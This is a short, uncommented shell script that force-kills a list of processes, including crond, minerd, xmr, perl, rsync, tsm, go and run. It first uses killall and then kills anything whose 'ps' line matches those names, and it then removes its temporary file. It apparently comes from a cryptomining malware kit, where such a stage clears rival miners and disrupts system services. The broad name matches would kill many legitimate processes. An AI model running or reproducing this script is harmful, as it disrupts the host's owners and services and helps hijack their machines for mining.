killall -9 crond>.proc
killall -9 yam>.proc
killall -9 minerd>.proc
killall -9 [idle]>.proc
killall -9 [rsync]>.proc
killall -9 perl>.proc
killall -9 run>.proc
killall -9 go>.proc
killall -9 tsm>.proc
killall -9 xmr>.proc

kill -9 `ps x|grep crond|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep yam|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep minerd|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep idle|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep rsync|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep perl|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep xmr|grep -v grep|awk '{print $1}'`>.proc
rm -rf .proc

